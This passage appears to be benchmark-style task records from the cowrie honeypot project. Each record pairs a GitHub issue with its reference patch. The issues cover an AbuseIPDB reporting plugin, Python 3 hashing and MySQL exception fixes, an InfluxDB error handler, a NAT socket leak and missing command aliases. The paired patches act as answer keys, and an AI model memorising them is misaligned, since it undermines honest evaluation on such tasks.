in ' + '%(retry_after)s seconds at %(wake_at)s', + retry_after=retry, + wake_at=self.epoch_to_string_utc(self.logbook.sleep_until) + ) + + def sleeper_thread(self): + # Cheap retry wait hack. Call in thread so as not to block. + sleep(10)
Add output plugin: AbuseIP Database Similar to SANS DShield and CSIRTG, AbuseIP also offers a public list of bad actors, with ability to export feeds to FAIL2BAN. API documentation at https://docs.abuseipdb.com/
@HQuest What would you like exactly? That the IPs brute-forcing the honeypots get reported to the AbuseIP database?

I would like Cowrie to publish such attackers, so systems outside honeypots can make use of this information and apply mitigation controls against known bad actors.

Going to work on this; when ready I will submit a PR.

@RobertH1993 Do you still plan on working on this? I might be able to take a look at this sometime in the next couple of weeks while confined if you're no longer interested.

@HQuest Do you have a preliminary set of criteria in mind for evaluating whether to report an IP or not? I.e. do you want to report after a certain number of failed login attempts, an SFTP/Wget event, a combination of events, etc?

I'm sorry I don't have time to work on it. If you want to please do so :)

I think a customizable count and frequency combination would be great. While one in a day could be an accident, five in a 30-second interval feels more like a brute-force attempt, but it all varies with each place's policies. Also, anything that does a file transfer (wget/curl/etc) - nobody should be moving files without permission - would also trigger an alarm. That's how I view it in a perfect world. Anything at all will be great. Thank you for stepping up.

Alex

Alright, I'll try and take a look at it in the next week and see what I can come up with. For the moment I might start with simply observing brute force login attempts and reporting any IP when it exceeds its threshold.
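For illustration, a minimal sketch of that sliding-window threshold idea (the constants and the `report` callback are illustrative stand-ins, not the plugin's eventual API; the merged plugin keeps this state in a `LogBook` dict instead):

```python
from collections import deque
from time import time

TOLERANCE_ATTEMPTS = 10       # report after this many failures...
TOLERANCE_WINDOW = 120 * 60   # ...seen within this many seconds

attempts = {}                 # ip -> deque of recent failure timestamps


def observe_failed_login(ip, report):
    now = time()
    log = attempts.setdefault(ip, deque(maxlen=TOLERANCE_ATTEMPTS))
    log.append(now)
    # drop timestamps that have fallen out of the tolerance window, so a
    # handful of attempts spread over days never triggers a report
    while log and log[0] < now - TOLERANCE_WINDOW:
        log.popleft()
    if len(log) >= TOLERANCE_ATTEMPTS:
        report(ip)            # hypothetical reporting callback
        del attempts[ip]
```

A wide window combined with a small attempt count is what catches the slow, rotating brute force described in the next message: the timestamps accumulate faster than they expire.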
As for detecting brute force, I'll make the threshold settings (both time and number of allowed attempts) adjustable from the config file, but personally I'd recommend setting the threshold for attempts higher than 5 (just in case someone really has just mistyped an IP address and actually thinks they're logging into their own server, even if this is really really unlikely) and, more importantly, a time longer than thirty seconds. A behaviour I've observed is bots which, I assume, rotate through a long list of IP addresses, making one guess on each one before attempting on the next. Given a window of a few minutes it might not look like much, but viewed over a long period it's quite clear that it's a brute force attack--just a very slow one.

I've also just sent a message asking the maintainers how they feel about re-reporting IPs less than 24 hours after the initial report if it's for another category of behaviour. Depending on their response and if all goes well getting an initial plugin in place, we can then look at other behaviours that could be reported. Have a think about what kinds of events you've seen in your log files that could be used as reporting criteria--things like cowrie.direct-tcpip.data, cowrie.command.input, etc--and what [AbuseIPDB reporting categories](https://www.abuseipdb.com/categories) they fit into.

To keep you updated, I've made a start on this today. [WIP is here](https://github.com/bn-s/cowrie-abuseipdb-api-plugin/)

Really appreciated. And I loved the observer functions ;)

Please also look at the GreyNoise, DShield and Virustotal plugins. They do approximately the same. Try to use `treq` or `twisted.web` to do your requests so they are asynchronous.
Use the standard config file, as the other plugins do; the system is extensible. Try to put all the code in a single file, in the existing `src/cowrie/output` directory structure. Once it's working, please submit a PR and I'll be happy to merge it.

Thanks for taking a look and for the feedback. Just to make sure we're on the same page:

- The abuseipdb folder is just a standard plugin module to be dropped into the `src/cowrie/output` folder like any other plugin. Being a folder rather than a single file is the only difference here.
- The plugin, whilst having its own config file, does use the standard config files. Indeed, any setting that appears in the standard config files takes priority over anything in the plugin's config file. The idea here is to avoid hard-coding anything so we can make some things customisable by a user who might not want to 'fiddle around in the code', but without dropping too many options into the standard cowrie files by default. That way if, for example, a user wants to set a daily limit on reports because they also use their api quota across other honeypots/projects/etc, the option is there if they dig but, for the user who just wants to get up and running, they just need to set their api key and that's it, without the anxiety of 'do I need to think about the settings of this thing...' when really, most will not. Of course, as above, I can easily change this if you prefer I don't do it.
- One of the plugins you've mentioned above is just making plain old synchronous requests using the standard python requests library. They're threaded so non-blocking, sure, but that is where I was going if your main concern was about blocking. Otherwise, Treq looks like it doesn't take much work to put in place, so I'm happy to take a look at that soon.

If you do desire that the plugin be reduced to a single file, that leads me to a question, as I was intending to dump/load a working dictionary into/from the plugin's folder on stop/start: is there another folder in the standard cowrie structure where you would be happy for me to dump a file to?

Hi! Thanks for the detailed comments!

* As long as it'll work the same as the other plugins, no objection against multiple files.
* There is already a 'default options' feature in Cowrie that can be overridden. The `cowrie.cfg.dist` contains the distribution options, which can be individually overridden by entries in `cowrie.cfg`. If you are adapting an existing library with an existing config file mechanism we can talk about this, but if you are implementing a settings overriding mechanism from scratch, you are better off using existing features.
* Yes, I have accepted synchronous requests libraries merge requests in the past. They don't seem to cause a lot of issues, but the general recommendation is to write them asynchronously; this will fit better in the Twisted model.
* There is currently no directory to store output to, but there is a `state_path` entry defined in `cowrie.cfg.dist`, so I'd use that, maybe followed by your plugin-name. By default that would then be `var/lib/cowrie/abuseip/`. I don't know how much state you're going to keep, but if it's just entries that need to be submitted, you can do those from the (now-working) `stop()` function as well.

Okay, so the utils module looks quite long, which may have given the impression that I'm up to something weird, but it's mostly just comments for myself and other utility type stuff that has nothing to do with parsing configs...
like making a time string into a tuple and, later, a function for calculating the number of seconds into the future this time will next occur so I have something I can give to twisted reactor in a `callLater()`... There's very little in there to do with reading and overriding configs or anything like that. Reducing it to just the bits that load configs, we're left with a vanilla configparser read and a one line dictionary merge, which is where the entirety of the custom settings overriding solution takes place.

```python
from configparser import ConfigParser

from cowrie... import CowrieConfig

PLUGIN_CFG_FILE = 'file.cfg'


class Confs:
    def __init__(self):
        self.__dict__.update(
            {**self.get_defaults(), **CowrieConfig()['abuseip']}
        )

    def get_defaults(self):
        parser = ConfigParser()
        f = PLUGIN_CFG_FILE
        parser.read(f)
        return parser['abuseip']
```

Seeing it extracted/reduced like so, how do you feel about it?

As for async requests--consider it done. I'm going to try and do a little work on the plugin later this afternoon or tomorrow morning, so I might even start there.

Hi! The standard `configparser` library has a lot of things you are reimplementing, like `configparser.getboolean` where you wrote `trudat`. There's `getint` as well, which has a fallback option in case no value is defined. The merge function is already in `configparser` as well, and it's what I use to merge `cowrie.cfg` with `cowrie.cfg.dist`; that could simplify a lot of your util.py. I still don't see why you need an additional config file, while all other plugins use `cowrie.cfg.dist`.

Okay, I'll drop the config file. It's a non-essential extra so I'm okay to do without it. For the curious readers, the reason why I did it as such is that (after making the decision to introduce an additional config file) I felt that a plugin should remain as self-contained as possible--anything the plugin does should not touch anything outside of itself unless absolutely unavoidable. So sure, I could have done the whole thing with `CowrieConfig`, but I thought that would be more controversial as it's a singleton so we don't get our own instance to play with. So, given that I decided to include a config file, I felt the most direct and efficient solution was to just do the read internally in the plugin and then merge the two dictionaries. I could have bypassed the `CowrieConfig` class and passed the file directly to the read function from the cowrie config module, but I wasn't planning the use of environment variables so really, it doesn't make too much difference either way as it's all just `configparser` and we still haven't merged the two configs. I could have also re-read the Cowrie configs using `configparser` and let my own instance sort it all out, but why perform an operation that has already been done? So as everything is now self contained, I felt it would be more efficient to just update the class dictionary with the two merged configs--we've given up a little inbuilt `configparser` functionality, but we also save lines of code and made the whole import operation far more lightweight. We never have to directly address anything that's going to remain a string and it's also more lightweight than penetrating 400 calls deep into the `configparser` labyrinth performing a get on each single item. In doing it like this we've only really introduced the risk that a user might change parameter names in the configs or try to reproduce class methods as config parameters for kicks...
but this has effectively the same consequences as someone typing `Flase` as a boolean value; we get an error, the plugin doesn't start, and life goes on as usual for the rest of Cowrie as we've kept the behaviour of the plugin contained to itself. As such, yeah, I did reproduce the boolean function, but aside from that no other functionality had to be reproduced, and the additional code is offset by no longer importing strings individually. Calling standard python `int()` isn't really reproducing anything; sure, it's redundant if we do a `configparser` get, only to later do the conversion, but that never happened. It also has the nice side effect that readability is improved a little...

```python
# This...:
self.something = int(self.something)
self.otherthing = makebool(self.otherthing)

# ...is a bit cleaner than this:
self.something = ConfigsClass().getint('output_pluginname', 'something', fallback=1337)
self.otherthing = ConfigsClass().getboolean('output_pluginname', 'otherthing', fallback=False)
```

As for the existence of a configs class--taking the modular approach I was going to take, it made more sense to import everything and do all the converting of types and data structures in one place. Like so, everything is ready to be dropped into any module/class anywhere else, ready to go, simply by typing `cfg.parameter_name`. It just makes life a little simpler and helps make things more explicit later on. That sums up the whys of what I've done.

I've had the time this afternoon to refactor some of what I've already done and add in Treq for requests. [There's an alpha version available here](https://github.com/bn-s/cowrie-abuseipdb-api-plugin/tree/master/Alpha). At the moment it should work... sort of... I hope. But it's completely untested so expect errors. If you do test it, please post any errors here and I'll look into them before I do a pull request.

I've made a couple of changes, done some testing, and everything is working as expected. I've spun up a live box (68.183.65.134:22) with [the current version](https://github.com/bn-s/cowrie-abuseipdb-api-plugin/tree/master/Alpha) which is [reporting here](https://www.abuseipdb.com/user/42261). I'm going to let it run for the weekend and test a couple of things, such as whether AbuseIPDB are sending the Retry-After header and whether we're receiving it reliably. If all goes well I'll submit a pull request in the new week.
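For reference, the fallback pattern the maintainer recommended above is what the merged plugin ends up using; a sketch (assuming the `output_abuseipdb` section and option names, and the fallback of 10 attempts is illustrative):

```python
from cowrie.core.config import CowrieConfig

# Each option falls back to a built-in default when it is absent from
# cowrie.cfg / cowrie.cfg.dist, so no plugin-specific config file is needed.
tolerance_attempts = CowrieConfig().getint(
    'output_abuseipdb', 'tolerance_attempts', fallback=10)
rereport_after = CowrieConfig().getfloat(
    'output_abuseipdb', 'rereport_after', fallback=24)
```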
2020-05-04T14:46:54
cowrie/cowrie
1,356
cowrie__cowrie-1356
[ "1332" ]
d026d0424baf523e4cbee008718dcc8e1ceb306b
diff --git a/src/cowrie/commands/ssh.py b/src/cowrie/commands/ssh.py --- a/src/cowrie/commands/ssh.py +++ b/src/cowrie/commands/ssh.py @@ -71,7 +71,7 @@ def start(self): Name or service not known\n' % (host,)) self.exit() else: - s = hashlib.md5(host).hexdigest() + s = hashlib.md5(host.encode()).hexdigest() self.ip = '.'.join([str(int(x, 16)) for x in (s[0:2], s[2:4], s[4:6], s[6:8])])
Unicode-objects must be encoded before hashing Hello,

**Describe the bug**
When the user types ssh user@server, the honeypot produces an error.

**To Reproduce**
Steps to reproduce the behavior:
1. Launch honeypot
2. Connect to fake system
3. Type ssh [email protected]
4. See error in logs

**Server (please complete the following information):**
- OS: Ubuntu 18.04
- Python: 3.6.9

**Additional context**
Traceback:
```
Traceback (most recent call last):
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/service.py", line 45, in packetReceived
    return f(packet)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/connection.py", line 258, in ssh_CHANNEL_DATA
    log.callWithLogger(channel, channel.dataReceived, data)
--- <exception caught here> ---
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/log.py", line 103, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/log.py", line 86, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 122, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 85, in callWithContext
    return func(*args,**kw)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/session.py", line 112, in dataReceived
    self.client.transport.write(data)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/session.py", line 163, in write
    self.proto.dataReceived(data)
  File "/home/valentin/honeypot/cowrie/src/cowrie/insults/insults.py", line 98, in dataReceived
    insults.ServerProtocol.dataReceived(self, data)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived
    self.terminalProtocol.keystrokeReceived(ch, None)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived
    m()
  File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 320, in handle_RETURN
    return recvline.RecvLine.handle_RETURN(self)
  File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN
    self.lineReceived(line)
  File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 182, in lineReceived
    self.cmdstack[-1].lineReceived(line)
  File "/home/valentin/honeypot/cowrie/src/cowrie/shell/honeypot.py", line 173, in lineReceived
    self.runCommand()
  File "/home/valentin/honeypot/cowrie/src/cowrie/shell/honeypot.py", line 289, in runCommand
    self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs'])
  File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 301, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 191, in call_command obj.start() File "/home/valentin/honeypot/cowrie/src/cowrie/commands/ssh.py", line 74, in start s = hashlib.md5(host).hexdigest() builtins.TypeError: Unicode-objects must be encoded before hashing ``` Thanks
I can't reproduce this. Which version are you on?

Hello, sorry for the late reply @micheloosterhof. Tested on trunk. Thanks

Confirmed! Seems to be a python2/3 string/bytes issue.
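The Python 2/3 difference in one line: on Python 3, `hashlib` digests operate on bytes, so a `str` must be encoded first, which is exactly what the patch does (the IP below is just an example input):

```python
import hashlib

# hashlib.md5('8.8.8.8')            # Python 3 raises TypeError:
                                    # "Unicode-objects must be encoded before hashing"
print(hashlib.md5('8.8.8.8'.encode()).hexdigest())  # works on Python 2 and 3
```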
2020-06-01T02:45:35
cowrie/cowrie
1,357
cowrie__cowrie-1357
[ "1355" ]
8b4003e9d605feea440dc00d6988de53f9579af8
diff --git a/src/cowrie/output/influx.py b/src/cowrie/output/influx.py --- a/src/cowrie/output/influx.py +++ b/src/cowrie/output/influx.py @@ -23,7 +23,7 @@ def start(self): self.client = InfluxDBClient(host=host, port=port, ssl=ssl, verify_ssl=ssl) except InfluxDBClientError as e: log.msg("output_influx: I/O error({0}): '{1}'".format( - e.errno, e.strerror)) + e.code, e.message)) return if self.client is None:
Programming errors in the InfluxDB plugin Something definitely seems wrong with the InfluxDB output plugin... I can see at least two possible problems: 1. The error handling ```python except InfluxDBClientError as e: log.msg("output_influx: I/O error({0}): '{1}'".format( e.errno, e.strerror)) return ``` seems wrong to me. If you inspect the source of the Python [InfluxDB client](https://github.com/influxdata/influxdb-python/blob/master/influxdb/exceptions.py), the `InfluxDBClientError` class does not have `errno` and `strerror` fields. I think the plugin should use `e.code` and `e.message` instead respectively. 2. In the plugin, there is some code like this: ```python m = { 'measurement': eventid.replace('.', '_'), 'tags': { 'session': entry['session'], 'src_ip': entry['src_ip'] }, 'fields': { 'sensor': self.sensor }, } ``` However `self.sensor` is not defined anywhere. I think it should be `entry['sensor']` instead.
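A sketch of the corrected handler from point 1, mirroring the merged patch above (shown as a standalone function for clarity; the real code lives in the plugin's `start()`, and the `message` attribute is used here only because both the issue and the patch rely on it):

```python
from influxdb import InfluxDBClient
from influxdb.exceptions import InfluxDBClientError
from twisted.python import log


def connect(host, port):
    try:
        return InfluxDBClient(host=host, port=port)
    except InfluxDBClientError as e:
        # the client's exception carries `code`/`message`,
        # not the `errno`/`strerror` of an OSError
        log.msg("output_influx: I/O error({0}): '{1}'".format(e.code, e.message))
        return None
```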
So `self.sensor` is set in `__init__()` in `src/cowrie/core/output.py`, so that should be inherited. For the other fields I think you are correct.
2020-06-01T02:56:36
cowrie/cowrie
1,364
cowrie__cowrie-1364
[ "1361" ]
e7952e0de91239f93df6f96899e007df87bbce79
diff --git a/src/backend_pool/nat.py b/src/backend_pool/nat.py --- a/src/backend_pool/nat.py +++ b/src/backend_pool/nat.py @@ -74,16 +74,15 @@ def request_binding(self, guest_id, dst_ip, ssh_port, telnet_port): self.lock.acquire() try: # see if binding is already created - if dst_ip in self.bindings: + if guest_id in self.bindings: # increase connected self.bindings[guest_id][0] += 1 return self.bindings[guest_id][1]._realPortNumber, self.bindings[guest_id][2]._realPortNumber - else: nat_ssh = reactor.listenTCP(0, ServerFactory(dst_ip, ssh_port), interface='0.0.0.0') nat_telnet = reactor.listenTCP(0, ServerFactory(dst_ip, telnet_port), interface='0.0.0.0') - self.bindings[guest_id] = [0, nat_ssh, nat_telnet] + self.bindings[guest_id] = [1, nat_ssh, nat_telnet] return nat_ssh._realPortNumber, nat_telnet._realPortNumber finally: @@ -94,10 +93,20 @@ def free_binding(self, guest_id): try: self.bindings[guest_id][0] -= 1 - # stop listening if no-one connected - if self.bindings[guest_id][0] == 0: + # stop listening if no one is connected + if self.bindings[guest_id][0] <= 0: self.bindings[guest_id][1].stopListening() self.bindings[guest_id][2].stopListening() + del self.bindings[guest_id] + finally: + self.lock.release() + + def free_all(self): + self.lock.acquire() + try: + for guest_id in self.bindings: + self.bindings[guest_id][1].stopListening() + self.bindings[guest_id][2].stopListening() finally: self.lock.release() diff --git a/src/backend_pool/pool_server.py b/src/backend_pool/pool_server.py --- a/src/backend_pool/pool_server.py +++ b/src/backend_pool/pool_server.py @@ -129,7 +129,7 @@ def __init__(self): def startFactory(self): # start the pool thread with default configs - self.pool_service = PoolService() + self.pool_service = PoolService(self.nat) self.pool_service.start_pool() def stopFactory(self): diff --git a/src/backend_pool/pool_service.py b/src/backend_pool/pool_service.py --- a/src/backend_pool/pool_service.py +++ b/src/backend_pool/pool_service.py @@ -33,8 +33,10 @@ class PoolService: A lock is required to manipulate VMs in states [available, using, used], since these are the ones that can be accessed by several consumers and the producer. All other states are accessed only by the single producer. """ - def __init__(self): + def __init__(self, nat_service): self.qemu = backend_pool.libvirt.backend_service.LibvirtBackendService() + self.nat_service = nat_service + self.guests = [] self.guest_id = 0 self.guest_lock = Lock() @@ -52,6 +54,10 @@ def __init__(self): self.ssh_port = CowrieConfig().getint('backend_pool', 'guest_ssh_port', fallback=-1) self.telnet_port = CowrieConfig().getint('backend_pool', 'guest_telnet_port', fallback=-1) + self.local_pool = CowrieConfig().get('proxy', 'pool', fallback='local') == 'local' + self.pool_only = CowrieConfig().getboolean('backend_pool', 'pool_only', fallback=False) + self.use_nat = CowrieConfig().getboolean('backend_pool', 'use_nat', fallback=True) + # detect invalid config if not self.ssh_port > 0 and not self.telnet_port > 0: log.msg(eventid='cowrie.backend_pool.service', @@ -99,6 +105,11 @@ def stop_pool(self): # force destroy remaining stuff self.qemu.destroy_all_cowrie() + # close any NAT sockets + if not self.local_pool and self.use_nat or self.pool_only: + log.msg(eventid='cowrie.backend_pool.service', format='Free all NAT bindings') + self.nat_service.free_all() + try: self.qemu.stop_backend() except libvirt.libvirtError:
Too many open files (EMFILE) We're using Cowrie with a proxy-backend configuration. It's seeing quite a few brute-forcing attempts, and something is causing the backend to leak file descriptors, eventually hitting Too many open files. The symptoms are very similar to https://github.com/cowrie/cowrie/issues/367, although in our case, the attackers are still stuck at the brute forcing phase, so they haven't reached the honeypot contents yet.

From the backend's cowrie.log:
```
2020-06-08T14:16:22.505410Z [backend_pool.nat.ServerFactory#info] Starting factory <backend_pool.nat.ServerFactory object at 0x7fc035e2ce80>
2020-06-08T14:16:22.507706Z [backend_pool.nat.ClientFactory#info] Starting factory <backend_pool.nat.ClientFactory object at 0x7fc035e2c3c8>
2020-06-08T14:16:22.508111Z [twisted.internet.tcp.Port#info] EMFILE encountered; releasing reserved file descriptor.
2020-06-08T14:16:22.508193Z [twisted.internet.tcp.Port#info] Re-reserving EMFILE recovery file descriptor.
2020-06-08T14:16:22.508593Z [backend_pool.nat.ClientFactory#info] Stopping factory <backend_pool.nat.ClientFactory object at 0x7fc035e2c3c8>
2020-06-08T14:16:23.235361Z [twisted.internet.tcp.Port#info] EMFILE encountered; releasing reserved file descriptor.
2020-06-08T14:16:23.235508Z [twisted.internet.tcp.Port#info] EMFILE recovery: Closed socket from ('172.16.1.6', 42942)
2020-06-08T14:16:23.235537Z [twisted.internet.tcp.Port#info] Re-reserving EMFILE recovery file descriptor.
2020-06-08T14:16:24.463433Z [-] Unhandled Error
Traceback (most recent call last):
  File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/application/app.py", line 399, in startReactor
  File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/application/app.py", line 312, in runReactorWithLogging
  File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/internet/base.py", line 1283, in run
  File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/internet/base.py", line 1292, in mainLoop
--- <exception caught here> ---
  File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/internet/base.py", line 913, in runUntilCurrent
  File "/srv/cowrie/cowrie-github/src/backend_pool/pool_service.py", line 280, in producer_loop
  File "/srv/cowrie/cowrie-github/src/backend_pool/pool_service.py", line 190, in __producer_check_health
  File "/srv/cowrie/cowrie-github/src/backend_pool/pool_service.py", line 151, in has_connectivity
  File "/srv/cowrie/cowrie-github/src/backend_pool/util.py", line 18, in nmap_port
  File "/usr/lib/python3.6/subprocess.py", line 423, in run
  File "/usr/lib/python3.6/subprocess.py", line 687, in __init__
  File "/usr/lib/python3.6/subprocess.py", line 1197, in _get_handles
builtins.OSError: [Errno 24] Too many open files
```

Under /proc/*/fd, I can see the fds piling up.
```
[...]
lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 85 -> 'socket:[127152879]'
lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 86 -> 'socket:[127156659]'
lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 88 -> 'socket:[127158533]'
lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 89 -> 'socket:[127158534]'
[...]
```

Netstat also confirms the same.
```
[...]
twistd 586 cowrie 184u IPv4 127199423 0t0 TCP *:42039 (LISTEN)
twistd 586 cowrie 185u IPv4 127212415 0t0 TCP *:37159 (LISTEN)
twistd 586 cowrie 186u IPv4 127217586 0t0 TCP *:41445 (LISTEN)
twistd 586 cowrie 187u IPv4 127205735 0t0 TCP *:35751 (LISTEN)
[...]
```

On the proxy, the only clue I've found so far is these "Lost connection" entries:

`2020-06-09T06:36:34.074618Z [BackendSSHTransport,client] Lost connection with the pool backend: id 1`

However, looking at src/cowrie/ssh_proxy/client_transport.py lines 97 onwards, this "error" seems to be emitted by a rather normal client disconnect, and shouldn't be harmful?

https://github.com/cowrie/cowrie/blob/master/src/cowrie/ssh_proxy/client_transport.py#L97

Proxy config:
```
[honeypot]
backend = proxy
interactive_timeout = 180

[proxy]
backend = pool
pool_max_vms = 2
pool = remote
pool_host = 172.16.1.190
pool_port = 6415
backend_user = <redacted>
backend_pass = <redacted>

[ssh]
version = <redacted>
forwarding = false
```

Backend config:
```
[backend_pool]
pool_only = true
recycle_period = 3600
listen_endpoints = tcp:6415:interface=172.16.1.190
# disable telnet on the guests
guest_telnet_port = 0
guest_image_path = /srv/cowrie/minimal-4-ubuntu-18.04.qcow2
guest_hypervisor = qemu
guest_memory = 512
nat_public_ip = 172.16.1.190
```

I've also tried changing the interactive_timeout at the proxy, but it doesn't seem to affect the fd leakage.
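The fix that landed (see the `nat.py` patch above) is essentially a refcounting repair; distilled to its core, with listener creation abstracted behind a caller-supplied factory:

```python
bindings = {}  # guest_id -> [refcount, listener]


def request_binding(guest_id, listen):
    if guest_id in bindings:                 # was `if dst_ip in bindings`, which never
        bindings[guest_id][0] += 1           # matched, so every login attempt opened
    else:                                    # fresh listening sockets that never closed
        bindings[guest_id] = [1, listen()]   # refcount now starts at 1, not 0
    return bindings[guest_id][1]


def free_binding(guest_id):
    bindings[guest_id][0] -= 1
    if bindings[guest_id][0] <= 0:
        bindings[guest_id][1].stopListening()
        del bindings[guest_id]               # drop the entry so the port is truly released
```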
2020-06-20T21:54:40
cowrie/cowrie
1,397
cowrie__cowrie-1397
[ "1395" ]
35c12dc14cda8ce46429936f2375c6ebfad3091d
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py
--- a/src/cowrie/output/mysql.py
+++ b/src/cowrie/output/mysql.py
@@ -31,7 +31,7 @@ def _runInteraction(self, interaction, *args, **kw):
         try:
             return adbapi.ConnectionPool._runInteraction(
                 self, interaction, *args, **kw)
-        except MySQLdb.OperationalError as e:
+        except (MySQLdb.OperationalError, MySQLdb._exceptions.OperationalError) as e:
             if e.args[0] not in (2003, 2006, 2013):
                 raise e
             log.msg("RCP: got error {0}, retrying operation".format(e))
@@ -65,10 +65,11 @@ def start(self):
                 cp_reconnect=True,
                 use_unicode=True
             )
-        except MySQLdb.Error as e:
+        except (MySQLdb.Error, MySQLdb._exceptions.Error) as e:
             log.msg("output_mysql: Error %d: %s" % (e.args[0], e.args[1]))
 
     def stop(self):
+        self.db.commit()
         self.db.close()
 
     def sqlerror(self, error):
MySQL error handling I have created several honeypots for other protocols (Android Debug Bridge, Citrix Netscaler, Elasticsearch, Internet Printing Protocol). In all of them I use Cowrie's idea of output plugins. However, the attack traffic for these protocols is much, much lower than for Telnet/SSH. Probably for this reason, the MySQL plugin often fails with the dreaded "(2006, 'MySQL server has gone away')" error. (Yes, sometimes more than 8 hours can pass between attacks.)

What bothered me is that the plugin failed with a stack trace. This isn't supposed to happen, because it intercepts this error just like Cowrie's MySQL plugin and tries to re-establish the connection. Then I noticed that the error that is being reported is not `MySQLdb.OperationalError`, as the code intercepts. Instead, it is `MySQLdb._exceptions.OperationalError`. And, indeed, linting the code complains that the `MySQLdb` module does not have a member named `OperationalError`. Similarly, there is no `MySQLdb.Error` - but there seems to be `MySQLdb._exceptions.Error` instead.

Shouldn't these be changed in Cowrie's MySQL module?

Also, from the [documentation of MySQLdb](https://mysqlclient.readthedocs.io/FAQ.html#my-data-disappeared-or-won-t-go-away):

> Starting with 1.2.0, MySQLdb disables autocommit by default, as required by the DB-API standard (PEP-249). If you are using InnoDB tables or some other type of transactional table type, you'll need to do connection.commit() before closing the connection, or else none of your changes will be written to the database.

Shouldn't the `stop()` method of Cowrie's MySQL plugin issue a `self.db.commit()` before closing the connection? Or maybe set `self.db.autocommit(True)` when opening it?
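A sketch of the commit-before-close shape the merged patch adopts (the connection parameters are illustrative only):

```python
import MySQLdb

db = MySQLdb.connect(host='localhost', user='cowrie',
                     passwd='secret', db='cowrie')  # illustrative credentials
# ... INSERTs happen here ...
db.commit()   # without this, pending writes are rolled back when the
              # connection closes (autocommit is off per PEP-249)
db.close()
# Alternative raised in this issue: db.autocommit(True) right after connect().
```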
Thanks for reporting! Those may be leftovers from the old `MySQL-python`, since we now moved to `mysqlclient` for Py3+
2020-08-10T08:33:43
cowrie/cowrie
1,415
cowrie__cowrie-1415
[ "1408" ]
a5ff09f02dfa0f5d8a875f38e6dd536697561672
diff --git a/src/cowrie/commands/fs.py b/src/cowrie/commands/fs.py --- a/src/cowrie/commands/fs.py +++ b/src/cowrie/commands/fs.py @@ -89,6 +89,7 @@ def handle_CTRL_D(self): commands['/bin/grep'] = command_grep +commands['grep'] = command_grep commands['/bin/egrep'] = command_grep commands['/bin/fgrep'] = command_grep @@ -156,6 +157,7 @@ def handle_CTRL_D(self): commands['/bin/tail'] = command_tail commands['/usr/bin/tail'] = command_tail +commands['tail'] = command_tail class command_head(HoneyPotCommand): @@ -215,6 +217,7 @@ def handle_CTRL_D(self): commands['/bin/head'] = command_head commands['/usr/bin/head'] = command_head +commands['head'] = command_head class command_cd(HoneyPotCommand): @@ -350,6 +353,7 @@ def call(self): commands['/bin/rm'] = command_rm +commands['rm'] = command_rm class command_cp(HoneyPotCommand): @@ -422,6 +426,7 @@ def resolv(pname): commands['/bin/cp'] = command_cp +commands['cp'] = command_cp class command_mv(HoneyPotCommand): @@ -489,6 +494,7 @@ def resolv(pname): commands['/bin/mv'] = command_mv +commands['mv'] = command_mv class command_mkdir(HoneyPotCommand): @@ -544,6 +550,7 @@ def call(self): commands['/bin/rmdir'] = command_rmdir +commands['rmdir'] = command_rmdir class command_pwd(HoneyPotCommand): @@ -556,6 +563,7 @@ def call(self): commands['/bin/pwd'] = command_pwd +commands['pwd'] = command_pwd class command_touch(HoneyPotCommand): diff --git a/src/cowrie/commands/wc.py b/src/cowrie/commands/wc.py --- a/src/cowrie/commands/wc.py +++ b/src/cowrie/commands/wc.py @@ -117,3 +117,4 @@ def handle_CTRL_D(self): commands['/usr/bin/wc'] = command_wc commands['/bin/wc'] = command_wc +commands['wc'] = command_wc
bash: rm not found **Describe the bug**
In my ttylogs, I see the following error: -bash: rm: command not found

**To Reproduce**
Steps to reproduce the behavior:
1. Log in
2. Create a file
3. Try to delete the file (rm -rf <filename>)

**Expected behavior**
An error saying that the file could not be deleted?

**Server (please complete the following information):**
- OS: Linux nanopineo2 5.8.6-sunxi64 #20.08.2 SMP Fri Sep 4 08:52:31 CEST 2020 aarch64 GNU/Linux
- Python: Python 3.7.3 (venv)

**Additional context**
Add any other context about the problem here.
